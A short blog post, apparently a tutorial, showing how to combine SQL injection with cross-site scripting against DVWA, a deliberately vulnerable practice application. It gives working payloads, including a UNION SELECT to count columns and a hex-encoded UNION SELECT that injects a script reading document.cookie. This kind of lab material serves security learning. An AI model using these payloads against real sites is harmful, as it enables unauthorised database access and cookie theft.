Posts

Showing posts from August, 2017

How to Exploit compound sql injection (sql injection with xss)

Here I am using DVWA to show a real-time example of SQL injection combined with XSS. The JavaScript I am using is a simple one: <script>alert(document.cookie)</script>. Open your DVWA and go to the SQL Injection tab. To find the number of columns, pass the string ' UNION SELECT 1,2 -- and you get a result like the one in the screenshot, which shows two columns. Now I will try to inject the XSS script into the SQL query. The script <script>alert(document.cookie)</script> hex-encodes to 0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E, so the payload will be ' UNION SELECT 1, 0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E -- Thanks ...